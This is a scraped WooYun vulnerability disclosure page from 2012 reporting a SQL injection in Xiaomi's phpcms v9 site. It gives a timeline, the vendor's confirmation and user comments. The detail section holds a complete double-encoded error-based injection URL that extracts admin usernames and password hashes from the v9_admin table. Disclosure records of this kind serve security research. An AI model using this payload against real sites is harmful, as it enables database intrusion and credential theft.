小米网站注入漏洞 | wooyun-2012-011892| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-011892

漏洞标题：小米网站注入漏洞

漏洞作者： x7iao

提交时间：2012-09-07 21:21

修复时间：2012-10-22 21:21

公开时间：2012-10-22 21:21

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-09-07：细节已通知厂商并且等待厂商处理中
2012-09-08：厂商已经确认，细节仅向厂商公开
2012-09-18：细节向核心白帽子及相关领域专家公开
2012-09-28：细节向普通白帽子公开
2012-10-08：细节向实习白帽子公开
2012-10-22：细节向公众公开

简要描述：

phpcms v9

详细说明：

http://www.xiaomi.cn/api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

漏洞证明：

修复方案：

补丁。

版权声明：转载请注明来源 x7iao@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2012-09-08 10:38

厂商回复：

核实中，thanks

漏洞评价：

2012-09-07 21:31 | x7iao ( 普通白帽子 | Rank:348 漏洞数:41 | 文能床上控萝莉，武能床上定人妻)

我乐呵呵
2012-09-08 09:00 | zhq445078388 ( 实习白帽子 | Rank:60 漏洞数:19 | 请牢记"杀进程点康姆")

@x7iao 祝你拿到m1s！哈哈盲注的看看小米重视不~
2012-09-08 09:00 | zhq445078388 ( 实习白帽子 | Rank:60 漏洞数:19 | 请牢记"杀进程点康姆")

= =额看错标题了。~ 不是盲注
2012-09-08 09:31 | x7iao ( 普通白帽子 | Rank:348 漏洞数:41 | 文能床上控萝莉，武能床上定人妻)

我是来求M2的
2012-09-08 10:30 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

关注一下
2012-09-08 10:52 | 咖啡 ( 实习白帽子 | Rank:48 漏洞数:20 )

送手机了
2012-09-08 11:08 | x7iao ( 普通白帽子 | Rank:348 漏洞数:41 | 文能床上控萝莉，武能床上定人妻)

@小米科技现在还有小礼物不
2012-09-08 17:27 | isxenos ( 实习白帽子 | Rank:71 漏洞数:8 | 也好)

送手机吧~
2012-09-08 20:38 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

送大哥大~
2012-10-23 16:02 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安，不只保险这么简单。)

借此漏洞感慨一下，我很反感很多厂商只要一碰到用户信息泄露就说：这个可能是CSDN密码泄露导致的。啊呸。。。
2013-09-04 02:07 | 浪迹海角 ( 路人 | Rank:20 漏洞数:4 | 低调，谢绝各种查水表、快递、家电下乡、人...)

用phpcms，还能在渣点不。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-011892

漏洞标题：小米网站注入漏洞

相关厂商：小米科技

漏洞作者： x7iao

提交时间：2012-09-07 21:21

修复时间：2012-10-22 21:21

公开时间：2012-10-22 21:21

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 x7iao@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-011892

漏洞标题：小米网站注入漏洞

相关厂商：小米科技

漏洞作者： x7iao

提交时间：2012-09-07 21:21

修复时间：2012-10-22 21:21

公开时间：2012-10-22 21:21

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-011892"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 x7iao@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：